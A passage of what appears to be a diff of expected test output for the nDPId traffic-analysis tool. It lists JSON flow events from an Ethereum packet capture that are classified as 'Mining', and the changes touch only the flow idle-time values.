+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1578508365226,"flow_last_seen":1578508366012,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1578508365045,"flow_last_seen":1578508365241,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365153,"flow_last_seen":1578508365387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1578508365189,"flow_last_seen":1578508365942,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":2209,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365846,"flow_last_seen":1578508366076,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1268,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1578508365741,"flow_last_seen":1578508366031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":1803,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508364832,"flow_last_seen":1578508365305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":1122,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365885,"flow_last_seen":1578508366042,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1332,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365295,"flow_last_seen":1578508365885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":1172,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365846,"flow_last_seen":1578508366076,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1268,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1578508365741,"flow_last_seen":1578508366031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":1803,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508364832,"flow_last_seen":1578508365305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":1122,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365885,"flow_last_seen":1578508366042,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1332,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365295,"flow_last_seen":1578508365885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":1172,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364925,"flow_last_seen":1578508364954,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364697,"flow_last_seen":1578508364773,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1136,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508364664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":1247,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Mining.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1578508364632,"flow_last_seen":1578508364787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":1065,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364682,"flow_last_seen":1578508364899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":1222,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508364523,"flow_last_seen":1578508364743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365189,"flow_last_seen":1578508365331,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":1435,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508364664,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":1247,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Mining.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1578508364632,"flow_last_seen":1578508364787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":1065,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364682,"flow_last_seen":1578508364899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":1222,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508364523,"flow_last_seen":1578508364743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365189,"flow_last_seen":1578508365331,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":1435,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508364272,"flow_last_seen":1578508364272,"flow_idle_time":180000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"3.112.138.57","dst_ip":"192.168.1.184","src_port":25516,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1578508364522,"flow_last_seen":1578508365440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":1274,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 